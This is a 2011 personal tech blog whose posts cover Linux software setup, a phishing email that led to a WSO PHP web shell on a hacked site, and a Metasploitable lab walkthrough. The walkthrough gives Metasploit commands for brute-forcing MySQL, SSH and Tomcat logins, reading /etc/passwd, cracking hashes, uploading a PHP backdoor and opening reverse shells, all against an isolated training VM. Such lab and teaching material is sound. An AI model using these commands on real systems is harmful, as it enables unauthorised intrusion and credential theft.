9/21/2011

Evernote and Nix/NeverNote on Ubuntu 10.04

Evernote is a great tool. I absolutely love it. The only con, is that it's nto available natively for Linux. So I have to run it under the Windows Emulator or wine. The installation is fairly simple.
  1. wget http://evernote.s3.amazonaws.com/win4/public/Evernote_4.5.0.5229.exe
  2. wine Evernote_4.5.0.5229.exe
Obviously not running natively there is a slight performance lag. This may be attributed to my 5 year old laptop. Although it's still usable, the slow synchronization soon becomes tiresome. Fortunately there is a Linux native client called NeverNote[2].
  1. sudo add-apt-repository ppa:vincent-c/nevernote
  2. sudo apt-get update
  3. sudo apt-get install nevernote
  4. nixnote
NixNote is a bit ugly, but functional. Definitely faster than running Evernote in emulation.  The feature that I like best is that you are able to encrypt the NixNote database using AES when you shutdown. This is a definite plus in my books.

Therefore, if you can live with the degraded performance, then Evernote will do, but if you need to work faster, want that extra bit of security, and an ugly interface does not bother you, then give NixNote (aka NeverNote) a try.

References:
  1. http://www.howtogeek.com/howto/35661/how-to-install-evernote-4.0-in-ubuntu-using-wine/
  2. http://www.techdrivein.com/2011/06/nevernote-open-source-evernote-clone.html

Cisco console from Ubuntu 10.04

It's pretty easy to set-up Cisco serial console connectivity on Ubuntu 10.04. The usual way is to use minicom. The serial ports usually called COM1-4 usually have the following address range;
  1. COM1 - 3E8
  2. COM2 - 2F8
  3. COM3 - 3E8
  4. COM4 - 2E8
To complete the setup first determine the address used for COM1 (or whichever serial port you wish to use) on your machine  query the kernel buffer ring using the dmesg command, then install and configure the minicom, modem emulation tool.
  1. sudo dmesg | grep tty
  2. sudo apt-get install minicom
  3. sudo minicom -s # Configure the terminal to use 9600-8-N-1 and save as dfl
  4. sudo minicom

References:
  1. https://help.ubuntu.com/community/CiscoConsole
  2. http://useopensource.blogspot.com/2007/01/using-cisco-console-in-linux.html

9/20/2011

KeePass on Ubuntu 10.04

KeePass is a very popular password management software. One of my client uses this for their systems and I was given a copy of their database. Since I mostly use linux when I am working, I needed a way to get this working on Ubuntu 10.04. Instructions are widely available, but again for my benefit, I have documented them here as step-by-step guide for myself. At the time of this blog post the 2.x version of KeePass was 2.16

Firstly install Mono. For more details refer to the Badger ports website[1].
  1. Edit the /etc/apt/sources.list file
    • Add the lines
      • # For mono 2.6 -> needed by KeePass
      • deb http://badgerports.org lucid main
  2. cd /etc/apt
  3. sudo wget http://badgerports.org/directhex.ppa.asc
  4. sudo apt-key add directhex.ppa.asc
  5. sudo apt-get update
  6. sudo apt-get install mono mono-devel
  7. mono --version
    • # Confirm the mono version is >= 2.6
Download and install the KeePass from the KeePass website[2].
  1. sudo mkdir -p /opt/KeePass2
  2. cd /opt/KeePass2
  3. wget http://downloads.sourceforge.net/keepass/KeePass-2.16.zip
  4. sudo unzip KeePass-2.16.zip
Execute the KeePass application
  1. mono /opt/KeePass2/KeePass.exe &
There does appear to be a lot of debug information (am assuming its debug information) written to the terminal, but these should be safe to ignore.

References:
  1. http://badgerports.org
  2. http://keepass.info

9/15/2011

SPAM - Westpac Notice

I recently got an email with the subject "[Bulk] Westpac Notice" claiming to be from "notice@westpac.com.au". I knew this was SPAM, but was curious none the less, I felt like investigating further, but didn't have much time... my curiosity got the better of me, and I decided to do some quick digging anyway.


The link on the email resolved to "http://www.backrite.com/cw3/assets/product_small/Westpac.com.au/Westpac/index.htm", I very crude attempt I thought, the least they could have done was attempt to get a domain that at least appears slightly legitimate or use a URL shortening service at least.

I fired up my debuggig VM and opened up Firefox and pasted the URL in, the site appeared to be down. This was going to be quicker than I thought. Next I examined the e-mail headers and found a number of interesting things;


iX-Apparently-To: me@me.com via 76.13.9.102; Mon, 12 Sep 2011 17:35:43 -0700
X-YahooFilteredBulk: 72.52.199.90
Received-SPF: none (domain of server22.01domain.net does not designate permitted sender hosts)
X-YMailISG: uqaL3oQWLDupZk39g7NZ_d1X.jvu2AiRfqDcSAS5WI1yggQj
 qKsr_wBhJ6fOB576uyrk3sOva0uAvBRbH2D9buWQ2RMJpgB.gBvrBbexkVVz
 XhkFvqbM2oAMn_GHLmNEOUb_wcs6rU031UCGN0Gc8InmvAhB8wE6ua0shbqw
 gqobfvaLzFTrjLeJ03BlqKdv3L_RDh4xyyLL2saipKDl7XkbKwLizqsr4c6R
X-Originating-IP: [72.52.199.90]
Authentication-Results: mail.me.com  from=westpac.com.au; domainkeys=neutral (no sig);  from=westpac.com.au; dkim=neutral (no sig)
Received: from 127.0.0.1  (EHLO server22.01domain.net) (72.52.199.90)
  by mail.me.com with SMTP; Mon, 12 Sep 2011 17:35:42 -0700
Received: from nobody by server22.01domain.net with local (Exim 4.69)
(envelope-from )
id 1R3GyS-0001kr-68
for me@me.com; Mon, 12 Sep 2011 20:35:40 -0400
To: me@me.com
Subject: [Bulk] Westpac Notice
X-PHP-Script: proteinat.com/store/images/tmp/z.php for 41.184.112.91
From:  
Reply-To: 
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Message-Id:
Date: Mon, 12 Sep 2011 20:35:40 -0400
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - server22.01domain.net
X-AntiAbuse: Original Domain - me.com
X-AntiAbuse: Originator/Caller UID/GID - [99 99] / [47 12]
X-AntiAbuse: Sender Address Domain - server22.01domain.net

Firstly, the originating IP did not match the server in the URL. Next the X-PHP-Script header gave an interesting clue, a copy and paste revealed another downed script, but this time the response from the server was more promising, a quick fuzz and I found "http://proteinat.com/store/images/cookie_load.php"

Which is a PHP shell called Web Shell by oRb or WSO. The running version was 2.5 which was released in June of 2011. The attacker must have exploited PHP and uploaded the file. The PHP shell allows for a console which is useful for work, e.g. creating a backdoor, as well as running exploits to escalate privileges to get root access. I have not had the chance to investigate further, but it would be interesting to determine how the hacker got in in the first place.

9/06/2011

IEEETrans on Mac OS X with texlive

While compiling a journal paper, I got the following error message "I couldn't open style file IEEEtran.bst"

The IEEETrans TeX distribution can be manullay installed by using the packages from CTAN [1] or  IEEE [2]. However since I use macports, I just had to;
  1. sudo port install texlive-publishers

References:
  1. http://www.ctan.org/tex-archive/macros/latex/contrib/IEEEtran/
  2. http://www.ieee.org/portal/cms_docs/pubs/transactions

9/03/2011

Metasploitable walkthrough

Note: this post will be updated when I have more time This never happened! and the Metasploitable2 walk-through is also available at http://nkush.blogspot.com.au/2015/02/metasploitable2-walk-through.html. 

I am sure there are plenty of metasploitable walkthroughs available, but I thought I'd chuck one up here anyway... Firstly download and unzip the metasploitable VMware image. I use virtual-box, and it works just as well. I ran my metasploitable image and BackTrack in host-only mode, so I had an isolated network to play in without damaging anything else.

For some of the brute force attacks you will need a wordlist of potential usernames and passwords. There are several free wordlists available. Kevin's Wordlist Page [2] is quite good. The generated wordlist should be sufficient for most attacks save for ones with rigorous password complexities enforced.

Note: Since this is just a demonstration/walk through, the attempts herein to circumvent the security of the host have not been throttled down to prevent detection, in fact the scans, and exploits run may be considered extremely noisy.

Discovery
  1. Find the IP address of the metasploitable host 
    • nmap -sn -n -T1 192.168.56.0/24 
  2. In this case the host IP was 192.168.56.101
  3. Scan the metasploitable host to find the OS and services running on it 
    • nmap -n -v -A -O -T1 -sS -sV 192.168.56.101 
    • The following services were identified; 21 running ProFTPD 1.3.1, 22 running OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0), 23 running Linux telnetd, 25 running Postfix smtpd, 53 running ISC BIND 9.4.2, 80 running Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch), 139 running Samba smbd 3.X (workgroup: WORKGROUP), 445 running Samba smbd 3.X (workgroup: WORKGROUP), 3306 running MySQL 5.0.51a-3ubuntu5, 5432 running PostgreSQL DB 8.3.0 - 8.3.7, 8009 running Apache Jserv (Protocol v1.3), 8180 running Apache Tomcat/Coyote JSP engine 1.1 on Host:  metasploitable.localdomain; OSs: Unix, Linux
  4. Search the exploit DB to see if any exploits exist, and run the metasploit exploit. I have discussed these in detail below. In a majority of cases the exploits already exist in metasploit and is just a matter of selecting the correct one and specifying the correct options and parameters to them.
MySQL
  1. The version accoring to the nmap scan was MySQL 5.0.51a-3ubuntu5
  2. http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=mysql
  3. Brute force the login
    • search mysql
    • use auxiliary/scanner/mysql/mysql_login
    • show options
    • set THREADS 1000 # adding the brute in brute force
    • set RHOST 192.168.56.101
    • set USERPASS_FILE /opt/msf3/demo-wordlist.txt
    • set STOP_ON_SUCCESS true
    • run
  4. [+] 192.168.56.101:3306 - SUCCESSFUL LOGIN 'root' : 'root'
  5. Install a mysql client locally and use the credentials to connect to the remote server and get a dump of the DB or run SQL queries, or another scanner to get the contents of /etc/passwd file to identify accounts that have shell access
    • back
    • use auxiliary/admin/mysql/mysql_sql
    • show options
    • set USERNAME root
    • set PASSWORD root
    • set RHOST 192.168.56.101
    • set SQL select load_file(\'/etc/passwd\')
    • run
  6. You should now have the contents of the /etc/password file 
TikiWiki
Using the credentials found using the brute force method above, we can connect using the mysql client, e.g. mysql -u root -p -h 192.168.56.101
  1. Check the databases installed
    • show databases;
  2. Returns the names of the databases, information_schema, mysql, tikiwiki, and tikiwiki195. Guessing from the name, it appears to be a database for a wiki application. A quick google search (http://info.tiki.org/Tiki+Wiki+CMS+Groupware) confirms this. This too is vulnerable and metasploit exploits exist.
    • back
    • use exploit/unix/webapp/tikiwiki_graph_formula_exec
    • show options
    • set RHOST 192.168.56.101
    • set PAYLOAD php/meterpreter/reverse_tcp
    • set LHOST 192.168.56.1
    • exploit
  3. This returns the username and password used with the wiki CMS and the meterpreter interface. The meterpreter console is very powerful and extremely useful in futher analysis of the host. We may come back to the meterpreter console.
  4. The good thing about wiki's and CMS's in general is the ability to load files onto the server. Unfortunately there are two tikiwiki databases in use. Fortunately both have the same details in their users_users table, i.e. username and password of admin and admin respectively.
  5. There is a requirement for uploading files to the compromised machine for easier access later, i.e. a back door, refer below [3-4]. We can test the upload of a backup by creating a simple file e.g. phpinfo.php with phpinfo(); in it, and then uploading it via the backup upload and then navigating to "http://192.168.56.101/tikiwiki/backups/phpinfo.php". If you see the PHP info page, then the uploads work great and backup PHP files are interpreted by the server.
  6. Now download a PHP shell and upload it for a shell backdoor. Here's a list of potential PHP shells;
Mysql Users

  1. Again using the MySQL credentials, we can query the user table in the mysql database using the mysql client.
    • mysql -u root -proot -h 192.168.56.101
    • use mysql
    • SELECT host, user, password FROM user;
  2. We are presented with additional users debian-sys-maint and the 41-byte hash values (*E07F0A7CCC0044345116513C989F45663C1F8347) of their password.
  3. I tried running john the ripper on this to see if I could crack the password, it was taking too long so I gave up. However you may have better luck, esp. with rainbow tables, etc.
    • The username and password hash were saved in a file e.g. mysql.txt in the following format; username:password, i.e. debian-sys-maint:*E07F0A7CCC0044345116513C989F45663C1F8347
    • john --format=mysql-sha1 mysql.txt
  4. We could have also copied the hash from the root account to the other accounts as we already know the root password, but the idea is to remain undetected

Apache
Port 80 has a web server running, we can connect using a browser to confirm and get a "It works!" page. To confirm the structure of the web directories we can use a fuzzer such as OWASP's DirBuster.
  1. The initial scans should confirm the tikiwiki CMS in it's structure. 

SSH
Based on the contents of the /etc/password file, we can not tweak our usernames file before trying to brute force an SSH connection.
  1. Brute force the SSH connection, inline other attempts we don't want to stop at the first one, but get all SSH login details, Note: for this walkthrough example below, I have just used the same file, but you should specify a different user file based on the content of /etc/passwd and password file to speed things up
    • back
    • use auxiliary/scanner/ssh/ssh_login
    • show options
    • set RHOSTS 192.168.56.101
    • set THREADS 1000
    • set USERPASS_FILE /opt/msf3/demo-wordlist.txt
    • set STOP_ON_SUCCESS false
    • run
  2. [+] 192.168.56.101:22 SSH - [23/30] - Success: 'user':'user' 'uid=1001(user) gid=1001(user) groups=1001(user) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
  3. [+] 192.168.56.101:22 SSH - [28/30] - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
  4. [+] 192.168.56.101:22 SSH - [29/30] - Success: 'service':'service' 'uid=1002(service) gid=1002(service) groups=1002(service) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
  5. [+] 192.168.56.101:22 SSH - [30/30] - Success: 'postgres':'postgres' 'uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
  6. Now we have shell access based on a number of logins

Tomcat
  1. Brute force the management login
    • back
    • use auxiliary/scanner/http/tomcat_mgr_login
    • show options
    • set RHOSTS 192.168.56.101
    • set RPORT 8180
    • exploit
  2. [+] http://192.168.56.101:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
  3. Get shell, by exploit the host, using the weak scanned password to deploy a payload
    • back
    • use exploit/multi/http/tomcat_mgr_deploy
    • show options
    • set USERNAME tomcat
    • set PASSWORD tomcat
    • set RPORT 8180
    • set PAYLOAD linux/x86/shell_reverse_tcp
    • set STOP_ON_SUCCESS true
    • exploit
  4. Should have shell now!
DistCC
This was discovered on a subsequent port scan using different paramters. Am not quote sure what it is, but there is an exploit in metasploit, and Wikipedia documentation indicated it's some sort of distributed compile for C and C++.

  1. The number of payloads are limited for this exploit, but still allow remote shell access
    • back
    • search distcc
    • use exploit/unix/misc/distcc_exec
    • show options
    • set RHOST 192.168.56.101
    • set PAYLOAD cmd/unix/reverse
    • set LHOST 192.168.56.1
    • exploit
    Files
    Here's a list of interesting files I found on the system, I hope to add more detailed descriptions and discuss their contents once I have the opportunity to investigate further.
    1. /root/reset_logs.sh
    Requirements:
    1. Metasploit  (I used Backtrack5)
    2. nmap
    3. Metasploitable
    References:
    1. http://www.exploit-db.com
    2. http://wordlist.sourceforge.net/
    3. http://www.gnucitizen.org/blog/reverse-shell-with-bash/
    4. http://www.plenz.com/reverseshell

    9/02/2011

    Metasploit presentation for CTF

    We had a CTF training at the labs today, where I tried to present a brief introduction to metasploit. I seriously doubt I did the tool any justice, but a colleage has requested a copy of the sides as a PDF document. I have uploaded the slides to http://www.kush.com.fj/resources/metasploit-presentation.pdf. The presentation was mostly a demo using metasploitable. Perhaps in future there may be an opportunity to do a complete walk through of the metasploitable image posted here. I started I started work on a metasploit walkthrough, its still incomplete but its a star. You can find the walk through here http://nkush.blogspot.com/2011/09/metasploitable-walkthrough.html


    Installing Metasploit 4.0.0 on Apple Mac OS X 10.6.8

    The installation instructions are quite well documented on the Rapid7 documentation site[1]; But in my usual style of duplicating data on the Internet, I have documented my efforts below. The key requirements of Xcode and macports was already addressed on this particular machine :)

    Note: It's important to ensure that any anti-virus (AV) software is temporarily disabled and appropriate scanning exceptions added, this is to prevent the AV from quarenteening the exploits and payloads that some with metasploit.

    1. sudo bash
    2. port selfupdate
    3. port install ruby19 +nosuffix
    4. echo $PATH # Ensure that /opt/local/bin appears before /usr/bin, else edit ~/.bash_profile file and source it; ". ~/.bash_profile" or "source ~/.bash_profile"
    5. port install mysql5-server
    6. gem install mysql
    7. cd /opt
    8. wget http://updates.metasploit.com/data/releases/framework-4.0.0.tar.bz2
    9. bunzip2 framework-4.0.0.tar.bz2
    10. tar xvf framework-4.0.0.tar
    11. cd msf3
    12. svn update
    13. ln -s /opt/msf3/msf* /opt/local/bin/

    References:
    1. https://community.rapid7.com/docs/DOC-1037
    2. http://www.metasploit.com/download/